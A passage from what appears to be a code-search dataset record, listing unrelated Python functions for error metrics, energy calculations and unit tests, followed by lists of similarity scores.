E(self):\n return self._E", "def E(self):\n return self._E", "def dependent_error_exp(data, weak_signal_data, num_weak_signal):\n\n w_model = train_weak_signals(data, weak_signal_data, num_weak_signal)\n\n training_data = data['training_data'][0].T\n training_labels = data['training_data'][1]\n val_data, val_labels = data['validation_data']\n val_data = val_data.T\n test_data = data['test_data'][0].T\n test_labels = data['test_data'][1]\n\n num_features, num_data_points = training_data.shape\n\n weak_signal_ub = w_model['error_bounds']\n weak_signal_probabilities = w_model['probabilities']\n weak_test_accuracy = w_model['test_accuracy']\n\n weights = np.zeros(num_features)\n\n print(\"Running tests...\")\n\n optimized_weights, ineq_constraint = train_all(val_data, weights, weak_signal_probabilities, weak_signal_ub, max_iter=5000)\n\n # calculate test probabilities\n test_probabilities = probability(test_data, optimized_weights)\n # calculate test accuracy\n test_accuracy = getModelAccuracy(test_probabilities, test_labels)\n\n print(\"\")\n print(\"+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n print(\"Experiment %d\"%num_weak_signal)\n print(\"We trained %d learnable classifiers with %d weak signals\" %(1, num_weak_signal))\n print(\"The accuracy of the model on the test data is\", test_accuracy)\n print(\"The accuracy of weak signal(s) on the test data is\", weak_test_accuracy)\n print(\"\")\n\n # calculate ge criteria\n print(\"Running tests on ge criteria...\")\n model = ge_criterion_train(val_data.T, val_labels, weak_signal_probabilities, num_weak_signal)\n ge_test_accuracy = accuracy_score(test_labels, np.round(probability(test_data, model)))\n print(\"The accuracy of ge criteria on test data is\", ge_test_accuracy)\n print(\"+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\n # calculate baseline\n print(\"Running tests on the baselines...\")\n baselines = runBaselineTests(val_data, weak_signal_probabilities)\n b_test_accuracy = getWeakSignalAccuracy(test_data, test_labels, baselines)\n print(\"The accuracy of the baseline models on test data is\", b_test_accuracy)\n print(\"\")\n\n output = {}\n output['ALL'] = test_accuracy\n output['WS'] = w_model['test_accuracy'][-1]\n output['GE'] = ge_test_accuracy\n output['AVG'] = b_test_accuracy[-1]\n\n return output", "def get_E(self):\r\n return self.E", "def E(self):\n\n print(\"\", file=self.logfile)\n print(\"Updating R\", file=self.logfile)\n\n\n TAE = toeplitz(self.A*self.e2[:self.P+1], np.zeros(self.P+1))\n TA = toeplitz(self.A, np.zeros(self.P+1))\n M = np.dot(TAE.transpose(), TA)\n res = toeplitz(np.concatenate([M[:,0], np.zeros((self.L_h-self.P-1))]),\n np.concatenate([M[0,:], np.zeros((self.L_h-self.P-1))]))\n res[-self.P:, -self.P:] = M[1:,1:]\n res = res*np.array([self.e2]).transpose()\n self.R = self.la*self.sigma2*np.linalg.inv(self.la*np.eye(self.L_h) + self.sigma2*res)\n\n\n\n print(\"\", file=self.logfile)\n print(\"Updating mu\", file=self.logfile)\n self.mu = np.dot(self.R, self.h)/self.sigma2\n\n\n # Propagate\n self._propagate_mu()\n self._propagate_R()", "def calcEVals(self):\n self.eVals,self.eVecs = np.linalg.eigh(self.rhoOp)", "def test_calc_baseline_error_to_observed_error(self):\r\n exp_ratio = calc_baseline_error_to_observed_error(\r\n self.baseline_error_input,\r\n self.obs_error_input)\r\n self.assertEqual(self.ratio_result, exp_ratio)", "def errorEMat(E1, E2):\n E1_normalized = E1 / E1[2][2];\n E2_normalized = E2 / E2[2][2];\n return torch.norm(E1_normalized - E2_normalized)", "def energy_func(self):\n i = self.inl[0].to_flow()\n o = self.outl[0].to_flow()\n\n T_m = (T_mix_ph(i, T0=self.inl[0].T.val_SI) +\n T_mix_ph(o, T0=self.outl[0].T.val_SI)) / 2\n\n return (i[0] * (o[2] - i[2]) -\n self.A.val * (\n self.E.val * self.eta_opt.val -\n (T_m - self.Tamb.val_SI) * self.lkf_lin.val -\n self.lkf_quad.val * (T_m - self.Tamb.val_SI) ** 2))", "def calcError(self, inherited_error):\r\n\t\tif inherited_error == None:\t\t# output neurons\r\n\t\t\tself.error = (self.target - self.value) * self.activate_der()\r\n\t\telse:\r\n\t\t\tself.error = inherited_error * self.activate_der()", "def evaluate_acc_eer(net, data_loader):\n correct = 0\n total = 0\n net.reset()\n target_scores = []\n non_target_scores = []\n for data in tqdm(data_loader):\n sample_input, output = data[0], data[1]\n sample_input = whiten(sample_input)\n mask, score = gate_activation(net, sample_input)\n selected_score = score[mask]\n if selected_score.size == 0:\n xo = 0.5\n else:\n xo = np.sum(selected_score) / selected_score.size\n total += 1\n correct += ((xo > 0.5) == output)\n if output == 1:\n target_scores.append(xo)\n else:\n non_target_scores.append(xo)\n\n target_scores = np.array(target_scores)\n non_target_scores = np.array(non_target_scores)\n\n pmiss, pfa = rocch(target_scores, non_target_scores)\n eer = rocch2eer(pmiss, pfa)\n\n return float(correct) / total, eer", "def energy_func(self):\n i = self.inl[0].to_flow()\n o = self.outl[0].to_flow()\n\n T_m = (T_mix_ph(i, T0=self.inl[0].T.val_SI) +\n T_mix_ph(o, T0=self.outl[0].T.val_SI)) / 2\n\n iam = (\n 1 - self.iam_1.val * abs(self.aoi.val) -\n self.iam_2.val * self.aoi.val ** 2)\n\n return (i[0] * (o[2] - i[2]) -\n self.A.val * (\n self.E.val * self.eta_opt.val * self.doc.val ** 1.5 * iam -\n (T_m - self.Tamb.val_SI) * self.c_1.val -\n self.c_2.val * (T_m - self.Tamb.val_SI) ** 2))", "def calc_error(y_real, y_pred):\n if len(y_real) > 0:\n curr_err = rmse(y_pred, y_real)\n else:\n curr_err = np.nan\n return curr_err", "def eccentricity(self):\n return sqrt(self.f * 2 - self.f ** 2)", "def evaluation_error(y_real, y_pred, max_rating, min_rating):\n mae = mean_absolute_error(y_real, y_pred)\n nmae = normalized_mean_absolute_error(y_real, y_pred,\n max_rating, min_rating)\n rmse = root_mean_square_error(y_real, y_pred)\n\n return mae, nmae, rmse", "def test_check_conformer_energy(self):\n v_list = [-272.2779012225, -272.2774933703, -272.2768397635, -272.2778432059, -272.278645477, -272.2789602654,\n -272.2788749196, -272.278496709, -272.2779350675, -272.2777008843, -272.2777167286, -272.2780937643,\n -272.2784838846, -272.2788050464, -272.2787865352, -272.2785091607, -272.2779977452, -272.2777957743,\n -272.2779134906, -272.2781827547, -272.278443339, -272.2788244214, -272.2787748749]\n v_list = np.array(v_list, np.float64)\n v_diff = (v_list[0] - np.min(v_list)) * constants.E_h * constants.Na / 1000\n self.assertAlmostEqual(v_diff / 2.7805169838282797, 1, 5)", "def get_R_e_test(E, M, g_e, T_e, R_e, epsilon):\n R_e_test = np.zeros((M,M))\n for i in range(M):\n for j in range(M):\n if i != j:\n R_e_test[i,j] = g_e**2*(E[i] - E[j])/(np.exp((E[i] \n - E[j])/T_e)-1)\n else:\n R_e_test[i,j] = g_e**2 * T_e\n return np.abs(R_e_test - R_e) < epsilon", "def keV(E):\n if np.min(E) >= 100:\n return E / 1000\n else:\n return E", "def get_error(self, params):\n return self.endog - self.predict(params)", "def eci(self):\n return self.__eci", "def error_rate(self):\n\n\t\treturn theano.tensor.mean(theano.tensor.neq(\n\t\t\tself.get_symbolic_predicted_labels(),\n\t\t\tself.symbolic_output))", "def error_calculation_test(self):\n dataOrg = [[1,1], [2,2], [3,3], [4,4], [5,5], [6,6], [7,8], [7.3, 5], [8, 0], [9,10]]\n dataCalc = [[1,3], [2,5], [3,0], [4,3], [5,5], [6.1,6], [7,3], [7.3, 5], [8, 0], [9,9]]\n # abs difference: 2 3 3 1 0 NA 5 0 NA 1\n # local errors: 200 150 200 50 0 NA 125 0 NA 20\n # sum: 745\n\n tsOrg = TimeSeries.from_twodim_list(dataOrg)\n tsCalc = TimeSeries.from_twodim_list(dataCalc)\n\n wmape = WeightedMeanAbsolutePercentageError()\n wmape.initialize(tsOrg, tsCalc)\n assert str(wmape.get_error())[:6] == \"93.125\"", "def estimate_accuracy(yEv, yEv_calc, disp = False):\n\n\tr_sqr = metrics.r2_score( yEv, yEv_calc)\n\tRMSE = np.sqrt( metrics.mean_squared_error( yEv, yEv_calc))\n\tMAE = metrics.mean_absolute_error( yEv, yEv_calc)\n\tDAE = metrics.median_absolute_error( yEv, yEv_calc)\n\n\tif disp:\n\t\tprint(\"r^2={0:.2e}, RMSE={1:.2e}, MAE={2:.2e}, DAE={3:.2e}\".format( r_sqr, RMSE, MAE, DAE))\n\n\treturn r_sqr, RMSE, MAE, DAE", "def erf(t):\n P = 0.3275911\n A = [0.254829592, -0.284496736, 1.421413741, -1.453152027, 1.061405429]\n T = 1.0 / (1 + P * t)\n Tn = T\n Poly = A[0] * Tn\n for i in range(1, 5):\n Tn = Tn * T\n Poly = Poly * A[i] * Tn\n return 1.0 - Poly * np.exp(-t * t)", "def B_res_e(f_ece, harm = 1.):\n return me/eV2J*f_ece*np.pi*2./harm", "def test_rr_se(results):\n truese = np.asarray([2.09826858, 30.60745128, 108.51947421, 0.95693751,\n 0.6564318])\n test_se = results.params_se()\n assert test_se == pytest.approx(truese)", "def calc_error_dist(self):\n pass", "def get_deltaE(self):\n return self.deltaE" ]
[ "0.6688616", "0.6576088", "0.6453312", "0.6436712", "0.6268617", "0.61915094", "0.60727984", "0.60624784", "0.6055529", "0.5957637", "0.5948924", "0.5935441", "0.59333384", "0.5899245", "0.5894991", "0.5884183", "0.5884183", "0.5883016", "0.5870002", "0.5867805", "0.58296996", "0.58256584", "0.5806175", "0.5805928", "0.5803038", "0.5796278", "0.57854205", "0.57710433", "0.5754452", "0.5753451", "0.5747029", "0.57426095", "0.5742036", "0.57251817", "0.5707274", "0.57006305", "0.5694029", "0.56927836", "0.5681012", "0.5664438", "0.56557095", "0.56531703", "0.5649919", "0.56457955", "0.5641291", "0.5625754", "0.5624976", "0.5624714", "0.5620939", "0.56174374", "0.5616939", "0.5610984", "0.56067747", "0.5603147", "0.55961365", "0.5594472", "0.5593996", "0.5593026", "0.5592446", "0.5584533", "0.5579173", "0.5578676", "0.5578064", "0.5572537", "0.5561491", "0.55601424", "0.55594176", "0.5553619", "0.553965", "0.55382764", "0.5537258", "0.552812", "0.55208635", "0.55208635", "0.5518403", "0.55179673", "0.5515055", "0.5510486", "0.5509502", "0.5506086", "0.55057645", "0.55053663", "0.55025256", "0.55017126", "0.5500882", "0.54932296", "0.54819643", "0.5481476", "0.54799813", "0.54792184", "0.5472846", "0.5469635", "0.5468635", "0.5462949", "0.5461399", "0.54491204", "0.5448523", "0.5445566", "0.5444299", "0.5437646" ]
0.55544835
67